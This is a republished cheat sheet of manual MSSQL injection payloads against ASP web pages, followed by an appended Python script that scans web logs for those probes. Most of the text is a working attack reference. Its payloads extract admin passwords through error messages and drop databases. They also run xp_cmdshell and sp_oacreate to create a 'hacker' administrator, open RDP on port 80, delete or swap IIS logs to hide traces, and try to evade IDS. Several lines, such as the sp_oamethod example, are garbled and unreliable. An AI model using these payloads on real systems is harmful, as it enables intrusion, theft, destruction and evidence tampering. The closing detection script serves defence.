Manual MSSQL injection of commonly used SQL statements

2025-01-17 Update. From: SLTechnology News&Howtos, Database section


Shulou(Shulou.com)06/01 Report--

Personal collection and arrangement

and exists (select * from sysobjects) // determine whether the backend is MSSQL

and exists (select * from tableName) // determine whether a table exists; tableName is the table name

and 1=(select @@VERSION) // MSSQL version

and 1=(select db_name()) // current database name

and 1=(select @@servername) // local server name

and 1=(select IS_SRVROLEMEMBER('sysadmin')) // determine whether the current login is a system administrator

and 1=(select IS_MEMBER('db_owner')) // determine whether the current user has db_owner (database owner) permission

and 1=(select HAS_DBACCESS('master')) // determine whether the current user can access the master database

and 1=(select name from master.dbo.sysdatabases where dbid=1) // database name; dbid is 1, 2, 3, ...

; declare @d int // whether stacked (multi-statement) queries are supported

and 1=(select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell') // determine whether xp_cmdshell exists

and 1=(select count(*) from master.dbo.sysobjects where name='xp_regread') // check whether the xp_regread extended stored procedure has been deleted

Add or remove a login (here named test) with SA permission (requires SA permission):

exec master.dbo.sp_addlogin test,password

exec master.dbo.sp_addsrvrolemember test,sysadmin

Stop or start a service (requires SA permission):

exec master..xp_servicecontrol 'stop','schedule'

exec master..xp_servicecontrol 'start','schedule'

Reveal the website directory:

create table labeng (lala nvarchar(255), id int)

declare @result varchar exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots','/',@result output insert into labeng (lala) values (@result)

and 1=(select top 1 lala from labeng), or: and 1=(select count(*) from labeng where lala>1)

--------

Enable 3389 (Terminal Services) from the command line and change the port number:

sc config termservice start= auto

net start termservice

// allow external connections

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x0 /f

// change port 3389 to 80

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 80 /f

SQL Server

To determine whether it is injectable:

http://www.targer.com/article.asp?id=6

http://www.targer.com/article.asp?id=6'

http://www.targer.com/article.asp?id=6 and 1=1

http://www.targer.com/article.asp?id=6 and 1=2

http://www.targer.com/article.asp?action=value' and 1=1

http://www.targer.com/article.asp?action=value' and 1=2

search keyword%' and 1=1

search keyword%' and 1=2

Determine the database type:

http://www.targer.com/article.asp?id=6 and user>0

http://www.targer.com/article.asp?id=6 and (select count(*) from sysobjects)>0

Reveal the current user's data information:

article.asp?id=6 having 1=1--

Reveal the columns of the table found above:

article.asp?id=6 group by admin.username having 1=1--

article.asp?id=6 group by admin.username,admin.password having 1=1--

Reveal arbitrary tables and columns:

and (select top 1 name from (select top N id,name from sysobjects where xtype=char(85)) T order by id desc)>1

and (select top 1 col_name(object_id('admin'),N) from sysobjects)>1

Reveal database data:

and (select top 1 password from admin where id=N)>1

Modify the data in the database:

; update admin set password='oooooo' where username='xxx'

Add data to the database:

; insert into admin values (xxx,oooooo)--

Delete the database:

; drop database webdata

Get the current database user name: and user>0

Get the current database name: and db_name()>0

Get the database version: and (select @@version)>0

Determine whether stacked (multi-statement) queries are supported: ; declare @a int--

Determine whether subqueries are supported: and (select count(1) from [sysobjects])>=0

Extended stored procedure of the database: exec master..xp_cmdshell

View the server's C: drive directory: ; exec master..xp_cmdshell 'dir c:\'

Determine whether an extended stored procedure exists: and 1=(select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell')

Restore the extended stored procedure: ; exec sp_addextendedproc xp_cmdshell,'xplog70.dll'

Delete the extended stored procedure: ; exec sp_dropextendedproc 'xp_cmdshell'

MSSQL 2000 provides some functions for accessing OLE objects, which can be used to obtain permissions indirectly:

; declare @s int

; exec sp_oacreate 'wscript.shell',@s

; exec master..spoamethod @ srecoveryrunwriting recordnullrecoverycmd.exeUniver c dir c:\'

Determine whether the current database user name has high permissions:

and 1=(select is_srvrolemember('sysadmin'))

and 1=(select is_srvrolemember('serveradmin'))

and 1=(select is_srvrolemember('setupadmin'))

and 1=(select is_srvrolemember('securityadmin'))

and 1=(select is_srvrolemember('diskadmin'))

and 1=(select is_srvrolemember('bulkadmin'))

Determine whether the current database user is db_owner:

and 1=(select is_member('db_owner'))

SQL Server stores the information about all its databases in the master.dbo.sysdatabases table; this table can be SELECTed with only PUBLIC permission:

and (select top 1 name from master.dbo.sysdatabases order by dbid)>0

and (select top 1 name from master.dbo.sysdatabases where name not in (select top 1 name from master.dbo.sysdatabases order by dbid) order by dbid)>0

Delete a log file:

; exec master.dbo.xp_cmdshell 'del c:\winnt\system32\logfiles\w3svc5\ex070606.log > c:\temp.txt'

Replace a log file:

; exec master.dbo.xp_cmdshell 'copy c:\winnt\system32\logfiles\w3svc5\ex070404.log c:\winnt\system32\logfiles\w3svc5\ex070606.log > c:\temp.txt'

Get the WEB path:

; declare @shell int

; exec master..sp_oacreate 'wscript.shell',@shell out

; exec master..sp_oamethod @shell,'run',null,'cmd.exe /c dir /s d:/index.asp > c:/log.txt'

Use XP_CMDSHELL to search:

; exec master..xp_cmdshell 'dir /s dbank index.asp'

Display server website configuration information command:

cmd /c cscript.exe c:\inetpub\adminscript\adsutil.vbs enum w3svc/1/root

cmd /c cscript.exe c:\inetpub\adminscript\adsutil.vbs enum w3svc/2/root

Use xp_regread to read the registry with PUBLIC permissions:

; exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','system\currentcontrolset\services\w3svc\parameters\virtual roots\','/'

For advanced technology under SQLSERVER, please refer to Chapter 5 of Zeng Yunhao's mastery script.

3. DSqlHelper

Test for the SYSADMIN permission:

and 1=(select IS_SRVROLEMEMBER('sysadmin'))

Likewise for serveradmin, setupadmin, securityadmin, diskadmin, bulkadmin and db_owner.

Detect xp_cmdshell (CMD command execution):

and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name='xp_cmdshell')

Detect xp_regread (registry read function):

and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name='xp_regread')

Detect sp_makewebtask (backup function):

and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name='sp_makewebtask')

Detect sp_addextendedproc:

and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name='sp_addextendedproc')

Detect xp_subdirs (reads subdirectories):

and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name='xp_subdirs')

Detect xp_dirtree (reads subdirectories):

and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name='xp_dirtree')

Modify the content:

; UPDATE tablename set field=content where 1

XP_CMDSHELL detection:

; exec master..xp_cmdshell 'dir c:\'

Restore xp_cmdshell:

; exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'

Add the user hacker with xp_cmdshell:

; exec master.dbo.xp_cmdshell 'net user hacker 123456 /add'

Add the user hacker to the Administrators group with xp_cmdshell:

; exec master.dbo.xp_cmdshell 'net localgroup administrators hacker /add'

Create the table test:

; create table [dbo].[test] ([dstr] [char](255))

Detect that the table test exists:

and exists (select * from test)

Read where the WEB root is located (read the registry):

; DECLARE @result varchar EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots','/',@result output insert into test (dstr) values (@result);--

Reveal the absolute path of the WEB root (error mode):

and 1=(select count(*) from test where dstr>1)

Delete table test:

; drop table test;--

Create a table dirs for viewing the directory listing:

; create table dirs (paths varchar, id int)

Add the directory listing to the table dirs:

; insert dirs exec master.dbo.xp_dirtree 'c:\'

Reveal the contents of the table dirs (error mode):

and 0<(select top 1 paths from dirs)

Back up the database (DATANAME):

declare @a sysname; set @a=db_name(); backup database @a to disk='c:\inetpub\wwwroot\down.bak';--

Delete table dirs:

; drop table dirs;--

Create the table temp:

; create table temp (id nvarchar, num1 nvarchar, num2 nvarchar, num3 nvarchar)

Add the drive list to the table temp:

; insert temp exec master.dbo.xp_availablemedia;--

Delete the table temp:

; delete from temp;--

Create the table dirs:

; create table dirs (paths varchar, id int);--

Get the subdirectory list with xp_subdirs:

; insert dirs exec master.dbo.xp_subdirs 'c:\';--

Reveal the contents (error mode):

and 0<(select top 1 paths from dirs)

Delete the table dirs:

; delete from dirs;--

Create the table dirs:

; create table dirs (paths varchar, id int)--

Use xp_cmdshell to view the contents of the directory:

; insert dirs exec master..xp_cmdshell 'dir c:\'

Delete the table dirs:

; delete from dirs;--

Detect sp_oacreate (command execution):

and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name='sp_oacreate')

Execute a CMD command with sp_oacreate:

; DECLARE @shell INT EXEC sp_oacreate 'wscript.shell',@shell OUTPUT EXEC sp_oamethod @shell,'run',null,'C:\WINNT\system32\cmd.exe /c net user hacker 123456 /add'

Create a directory with sp_oacreate:

; DECLARE @shell INT EXEC sp_oacreate 'wscript.shell',@shell OUTPUT EXEC sp_oamethod @shell,'run',null,'C:\WINNT\system32\cmd.exe /c md c:\inetpub\wwwroot\1111'

Create a virtual directory E disk:

; declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',NULL,'cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "default Web site" -v "e","e:\"'

Make the virtual directory E browsable:

; declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',NULL,'cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse'

Start the SERVER service:

; exec master..xp_servicecontrol 'start','server'

Bypass IDS detection of xp_cmdshell:

; declare @a sysname set @a 'dir c:\'

Open a remote database, method 1:

; select * from OPENROWSET('SQLOLEDB','server=servername;uid=sa;pwd=apachy_123','select * from table1')

Open a remote database, method 2:

; select * from OPENROWSET('SQLOLEDB','uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;','select * from table')
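From the defender's side, every probe in this collection leaves a recognisable trace in the web server's request log. The following is an added example (not part of the original collection) that URL-decodes the query string of IIS W3C-style log lines and tags the probe families listed above: tautologies (and 1=1), MSSQL fingerprinting (sysobjects, @@version), role checks (IS_SRVROLEMEMBER), stacked statements (;exec, ;declare), dangerous procedures (xp_cmdshell, sp_oacreate, OPENROWSET) and HAVING/GROUP BY error-based extraction. The log lines and the simplified six-field log format are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Signatures taken from the probes listed on this page (case-insensitive).
# Each pattern is applied to the URL-decoded query string of one request.
PROBE_PATTERNS = {
    "tautology": re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I),
    "mssql_fingerprint": re.compile(
        r"\bsysobjects\b|\bsysdatabases\b|@@version|@@servername", re.I),
    "role_check": re.compile(r"is_srvrolemember|is_member|has_dbaccess", re.I),
    "stacked_query": re.compile(
        r";\s*(?:declare|exec|insert|update|drop|create|select)\b", re.I),
    "dangerous_proc": re.compile(
        r"xp_cmdshell|xp_regread|xp_dirtree|xp_subdirs|sp_oacreate|sp_oamethod"
        r"|sp_addextendedproc|openrowset|xp_servicecontrol", re.I),
    "error_based": re.compile(r"\bhaving\s+1\s*=\s*1|\bgroup\s+by\b", re.I),
}

# Constructed sample log, simplified IIS W3C layout:
# date time method uri-stem uri-query status
SAMPLE_LOG = """\
2024-05-01 10:00:01 GET /article.asp id=6 200
2024-05-01 10:00:02 GET /article.asp id=6'+and+1=1 200
2024-05-01 10:00:03 GET /article.asp id=6+and+1=(select+IS_SRVROLEMEMBER('sysadmin')) 500
2024-05-01 10:00:04 GET /article.asp id=6;exec+master..xp_cmdshell+'dir+c:\\' 500
2024-05-01 10:00:05 GET /article.asp id=6+having+1%3D1-- 500
2024-05-01 10:00:06 GET /search.asp q=laptop 200
"""

def classify_query(raw_query):
    """Return the set of probe families matched by one URL-encoded query string."""
    decoded = unquote_plus(raw_query)   # '+' and %XX become the attacker's real text
    return {name for name, pat in PROBE_PATTERNS.items() if pat.search(decoded)}

def scan_log(text):
    """Return (uri_stem, decoded_query, families) for every line matching a probe."""
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 6:              # malformed or truncated line: skip, never crash
            continue
        _date, _time, _method, stem, query, _status = parts[:6]
        families = classify_query(query)
        if families:
            hits.append((stem, unquote_plus(query), sorted(families)))
    return hits

if __name__ == "__main__":
    for stem, query, families in scan_log(SAMPLE_LOG):
        print(f"{stem} {query!r} -> {families}")
```

A status 500 next to a tagged query is the error-based extraction described above actually succeeding, so those lines deserve priority in triage.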
